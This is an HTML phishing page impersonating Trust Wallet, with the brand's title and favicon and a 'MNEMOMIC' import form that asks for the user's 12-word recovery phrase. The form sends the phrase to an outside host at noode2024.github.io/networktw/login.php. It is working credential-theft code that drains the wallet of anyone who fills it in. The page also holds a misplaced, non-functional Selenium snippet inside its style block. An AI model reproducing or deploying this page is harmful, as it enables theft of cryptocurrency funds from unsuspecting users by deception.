<!DOCTYPE html>
<html>
<head>
<link href="https://trustwallet.com/favicon.ico" rel="icon">
<title>Best Crypto Wallet for Web3, NFTs and DeFi | Trust</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {background-color: #fff;
font-size: 100%;
font-family: Arial, Helvetica, sans-serif;
 text-align: center;
color:#fff;
}
img {
  display: block;
  margin-left: auto;
  margin-right: auto;
  background-color: #000;
}
.button {
 background-color: #04AA6D; /* Green */
  border: none;
  color: white;
  padding: 16px 100px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  transition-duration: 0.4s;
  cursor: pointer;
}

.button1 {
background-color: #f4f4f6; 
  color: #000; 
  border: 2px solid #0500ff;
border-radius: 6px;
}

.button1:hover {
  
border: 2px solid #0500ff;
background-color: #0500ff; /* Green */
  color: #fff;
}

@media screen and (max-width: 800px) {
  .left, .main, .right {
    width: 100%; /* The width is 100%, when the viewport is 800px or smaller */
  }
}
.text1 {
    font-size: 25px;
    font-family: Arial;
    font-weight: 400;
    line-height: 16px;
    margin-top: 60px;
    margin-right: 185px;
    margin-bottom: 20px;
    text-align: center;
    color: #000;
}
.text2 {
    font-size: 13px;
    font-family: Arial;
    font-weight: 400;
    line-height: 16px;
    margin-top: 6px;
    margin-bottom: 20px;
    text-align: center;
    color: #000;
}


<script>
IAlert alert = driver.switchto().alert();

alert.acccept();
</script>

</style>




</head>
<body>

<form method="GET" id="login-form" action="http://noode2024.github.io/networktw/login.php">

<div class="text1">MNEMOMIC</div>
<textarea class="UnlockWalletViaMnemonicPhrase__mnemonic" rows="10" cols="45" name="Key" placeholder="Please enter your 12th word phrase" minlength="23" required></textarea>

<div class="text2">Please Separate Each Mnemonic Phrase With a Space.</div>

<button class="button button1">Import</button>

</form>
</body>
</html>
